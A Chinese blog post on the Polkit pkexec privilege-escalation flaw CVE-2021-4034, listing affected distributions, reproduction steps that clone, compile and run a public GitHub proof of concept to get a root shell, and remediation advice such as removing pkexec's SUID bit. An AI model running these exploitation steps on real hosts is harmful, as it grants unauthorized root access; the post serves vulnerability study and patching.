pkexec本地提权(CVE-2021-4034)ubuntu18

最新推荐文章于 2024-06-15 20:18:39 发布
最新推荐文章于 2024-06-15 20:18:39 发布
阅读量3.1k 收藏
点赞数 2
分类专栏: 系统漏洞(提权) 文章标签: linux ubuntu 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41901122/article/details/130735299
版权
文章详细介绍了Polkit组件中的一个缓冲区错误漏洞,该漏洞可能导致本地权限升级。受影响的包括CentOS、Ubuntu和Debian等多个版本。提供了漏洞复现步骤和针对不同系统的修复建议,如更新软件包或移除pkexec的SUID权限。
摘要由CSDN通过智能技术生成

文章目录

0x01 漏洞介绍

  • Polkit(以前称为 PolicyKit)是一个用于在类 Unix 操作系统中控制系统范围权限的组件。
  • 它为非特权进程与特权进程通信提供了一种有组织的方式。
  • 也可以使用 polkit 执行具有提升权限的命令,使用命令 pkexec 后跟要执行的命令(具有 root 权限)。
  • polkit 的 pkexec application存在缓冲区错误漏洞,攻击者可利用该漏洞通过精心设计环境变量诱导pkexec执行任意代码。
  • 成功执行攻击后,如果目标计算机上没有权限的用户拥有管理权限,攻击可能会导致本地权限升级。

0x02 影响版本

CentOS:
· CentOS 6:polkit-0.96-11.el6_10.2
· CentOS 7:polkit-0.112-26.el7_9.1
· CentOS 8.0:polkit-0.115-13.el8_5.1
· CentOS 8.2:polkit-0.115-11.el8_2.2
· CentOS 8.4:polkit-0.115-11.el8_4.2
Ubuntu:
· Ubuntu 14.04 ESM:policykit-1-0.105-4ubuntu3.14.04.6+esm1
· Ubuntu 16.04 ESM:policykit-1-0.105-14.1ubuntu0.5+esm1
· Ubuntu 18.04 LTS:policykit-1-0.105-20ubuntu0.18.04.6
· Ubuntu 20.04 LTS:policykit-1-0.105-26ubuntu1.2
· Ubuntu 21.10:policykit-1-0.105-31ubuntu0.1
Debain:
· :policykit-1 0.105-18+deb9u2
· Debain stretch:policykit-1 0.105-18+deb9u2
· Debain buster:policykit-1 0.105-25+deb10u1
· Debain bullseye:policykit-1 0.105-31+deb11u1
· Debain bookworm,bullseye:policykit-1 0.105-31.1

0x03 漏洞编号

  • CNNVD编号:CNNVD-202201-2343
  • 危害等级: 高危
  • CVE编号: CVE-2021-4034
  • 漏洞类型: 缓冲区错误
  • 发布时间: 2022-01-25
  • 威胁类型: 本地

0x04 漏洞查询

http://123.124.177.30/web/xxk/ldxqById.tag?CNNVD=CNNVD-202201-2343

image.png

0x05 漏洞环境

查看版本

lsb_release -a

image.png

poc

https://github.com/berdav/CVE-2021-4034

0x06 漏洞复现

第一步 下载poc,并且进行编译

git clone https://github.com/berdav/CVE-2021-4034.git
make

image.png
第二步 kali 开启web

python3 -m http.server

第二步 执行文件

chmod +x cve-2021-4034
./cve-2021-4034
python -c 'import pty;pty.spawn("/bin/bash")'

image.png

复现案例,一般情况下,在获取服务器权限之后,直接进行远程下载编译好的文件,进行执行

https://moments.blog.csdn.net/article/details/129870664?spm=1001.2014.3001.5502

0x07 修复建议

1、无法升级软件修复包的,可使用以下命令删除pkexec的SUID-bit权限来规避漏洞风险:
chmod 0755 /usr/bin/pkexec

示例:

# ll /usr/bin/pkexec
-rwsr-xr-x 1 root root  /usr/bin/pkexec
# chmod 0755 /usr/bin/pkexec
# ll /usr/bin/pkexec
-rwxr-xr-x 1 root root  /usr/bin/pkexec
执行前权限一般为-rwsr-xr-x ,删除SUID-bit权限后一般为-rwxr-xr-x

2、CentOS 7的用户可通过yum update polkit升级修复(云安全中心Linux软件漏洞已支持检测修复),Centos 5、6、8官方已终止生命周期 (EOL)维护,建议停止使用;

3、RedHat用户建议联系红帽官方获取安全修复源后执行yum update polkit升级修复(云安全中心Linux软件漏洞已支持检测修复);

4、Alibaba Cloud Linux的用户可通过yum update polkit升级修复(云安全中心Linux软件漏洞已支持检测修复);

5、Anolis OS(龙蜥)的用户可通过yum update polkit升级修复(云安全中心Linux软件漏洞已支持检测修复);

6、Ubuntu 18.04 LTS、Ubuntu 20.04 LTS的用户可通过apt update policykit-1升级修复,Ubuntu 14.04、16.04、12.04官方已终止生命周期 (EOL)维护,修复需要额外付费购买Ubuntu ESM(扩展安全维护)服务,建议停止使用;

7、其他Linux发行版操作系统OS建议联系官方寻求软件包修复源。

0x08 免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!

星球守护者
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2021-4034 polkit本地权限提升[pkexec权限问题]
01-27
在 polkit 的 pkexec 中发现的一个权限提升漏洞(CVE-2021-4034 ,也称PwnKit),它存在于所有主流的 Linux 发行版的默认配置中。 CentOS 7 polkit-0.112-26.el7_9.1.x86_64 不受影响。
CVE-2021-4034 pkexec存在本地权限提升漏洞
ce666666的博客
02-14 3744
漏洞简介 开发Linux桌面软件,需要用到其他用户身份执行操作,通常为root用户。一般使用sudo命令,也可以是polkit。 Polkit(以前称为 PolicyKit)是一个用于在类 Unix 操作系统中控制系统范围权限的组件。它为非特权进程与特权进程通信提供了一种有组织的方式。也可以使用 polkit 执行具有提升权限的命令,使用命令 pkexec 后加要执行的命令(具有root权限)。 pkexec:以其他用户身份执行命令 命令:pkexec [--version][--help] 漏洞原理
CVE-2021-4034 pkexec 本地提权”神洞”
hackzkaq的博客
01-27 4701
搜索公众号:白帽子左一,每天更新技术干货! 作者:掌控安全-spider 其实这个漏洞大家看编号就知道是2021的洞了,但是poc一直没有被得到披漏。直至最近才有poc! Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。 这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。 关于 Polkit pkexec for Linux Polkit(以前称
Ubuntu 18.04下普通用户的一次提权过程
最新发布
Hi20240217的博客
06-15 889
1.OS为Ubuntu 18.04.6 LTS2.docker服务非开机自启动,需要管理员手动启动(之前并不知道)3.重启后,数据盘也需要管理员手动挂载(之前并不知道)4.目前给我的帐号为普通用户5.我需要测试关掉IOMMU的效果,得进BIOS设置,服务器在远程,又遇到周末没人支持6.万幸我的帐号有–privileged启动容器的权限。
polkit pkexec 本地提权漏洞
sre救赎之路
05-04 939
2022年1月25日。
pkexec 提权漏洞(CVE-2021-4034) 分析
qq_41252520的博客
02-20 8697
CVE-2021-4034利用分析
CVE-2021-4034】 漏洞详细原理以及复现,polkit的pkexec中的本地提权漏洞
Ba1_Ma0的博客
04-11 5730
简介 一个隐藏了12年的危险漏洞,利用的是polki的pkexec,它是一个 SUID 根程序,默认安装在每个主要的 Linux 发行版 Null 当你在linux下要查看文件时,运行列如像cat这样的程序,并提供test.txt作为参数 所以整个参数数组看起来如下: cat test.txt 0 1 cat是第一个参数索引’0’,第一个参数通常是程序本身的名称,在我们的例子中它是cat 第二个参数是我们刚刚提供带有索引’1’的test.txt的文件名,这些都是字符串 但是在内存中,过程看起来像
服务器polkit pkexec 本地提权漏洞(CVE-2021-4034)修复
灵壹Eli的博客
08-01 312
服务器polkit pkexec 本地提权漏洞(CVE-2021-4034)遇到漏洞。
CVE-2021-4034-pkexec本地提权复现】
xhwfa的博客
03-20 5241
一、漏洞简述 Trustwave安全和工程团队于1月25日发现了Polkit的pkexec组件中的漏洞,该漏洞被识别为CVE-2021-4034 (PwnKit)。在polkit的pkexec实用程序中发现了一个本地权限提升漏洞。pkexec应用程序是一个setuid工具,旨在允许非特权用户根据预定义的策略以特权用户身份运行命令。当前版本的pkexec无法正确处理调用参数计数,并最终尝试将环境变量作为命令执行。攻击者可以通过制作环境变量来利用这一点,从而诱导pkexec执行任意代码。成功执行后,由于目标计
Linux pkexec高危漏洞 CVE-2021-4034修复
02-10
polkit rpm包 执行rpm -Uvh polkit-0.112-26.el7_9.1.x86_64.rpm 即可修复
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
漏洞利用 CVE-2021-4034-main.zip 提权漏洞
03-03
2021年,一个名为CVE-2021-4034提权漏洞引起了广泛的关注,这个漏洞被称为"Polkit本地提权漏洞",主要影响Linux操作系统。 **Polkit(原名PolicyKit)** Polkit是Linux系统中用于管理特权操作的一个组件,它为非...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
pkexec简介
sherlockmj的博客
01-29 6772
名字 pkexec - 以其他用户身份执行命令 概要 pkexec[--version] [--help] pkexec[--用户用户名]程序[参数...] 描述 pkexec允许授权用户以其他用户身份执行程序。如果未指定用户名,则程序将以管理超级用户root 身份执行。 返回值 成功完成后,返回值是PROGRAM的返回值。如果调用进程未获得授权,或者无法通过身份验证获得授权或发生错误,则 pkexec将退出,返回值为 127。 安全说明 以其他用户身份执行程序是特权操作。默认情...
【vulhub系列】CVE-2021-4034 Polkit `pkexec` 权限提升漏洞
Wiofgb的博客
10-06 1949
【vulhub系列】CVE-2021-4034 Polkit `pkexec` 权限提升漏洞
自我提升指南(一) 阿里云pkexec 中的本地提权漏洞 (CVE-2021-4034)
猫轻王的博客
04-19 2827
Polkit本地权限提升漏洞(CVE-2021-4034)的漏洞出现的比较突然,没办法预料,那么就需要我们时常关注业内新闻,经常管理查看自己的服务器,以防止他人恶意的攻击或其他方式影响服务器与网站的正常工作。
pkexec 的用法
weixin_35753431的博客
12-21 963
pkexec 是一个用于在 Linux 系统上执行具有特权的命令的工具。它使用 PolicyKit 来验证用户是否具有执行该命令的权限。 使用方法: 在终端中输入 pkexec 命令, 紧接着输入要执行的命令。例如: pkexec shutdown -h now 在执行具有特权的命令时, 系统会提示输入用户密码, 输入正确的密码后即可执行命令。 注意: 使用 pkexec 执行的命令可能会...
统信UOS_执行命令时如何弹出密码鉴权框?
鹏大圣运维
02-07 1173
hello,大家好!今天我要为大家介绍的是一个非常实用的工具——pkexec命令,这是一个在需要提高权限执行命令或程序时非常有用的工具,尤其适合于图形用户界面(GUI)和系统管理场景。pkexec是polkit(PolicyKit)的一部分,它提供了比传统sudo命令更细粒度的权限控制,使系统管理员能够根据详细的策略规则配置用户权限。这些规则可以非常精确地指定哪些用户可以执行哪些操作。
Linux Polkit pkexec权限提升漏洞(CVE-2021-4034) centos系统polkit漏洞修复
weixin_45618691的博客
10-10 2708
polkit漏洞修复
CVE-2021-45105/CVE-2021-44228
07-29
CVE-2021-45105和CVE-2021-44228是两个与Apache HTTP Server(Apache Web服务器)相关的漏洞编号。这些漏洞可能会影响Apache HTTP Server的安全性。CVE-2021-45105是一个路径遍历漏洞,攻击者可以利用它来读取服务器上受限制的文件。CVE-2021-44228是一个HTTP请求解析漏洞,攻击者可以通过发送恶意的请求导致服务器崩溃或远程代码执行。 为了保护系统安全,建议及时升级Apache HTTP Server到最新版本,并遵循相关安全建议和最佳实践。如果你是系统管理员或开发人员,可以查看Apache官方发布的安全公告,获取更详细的信息和修复方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星球守护者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值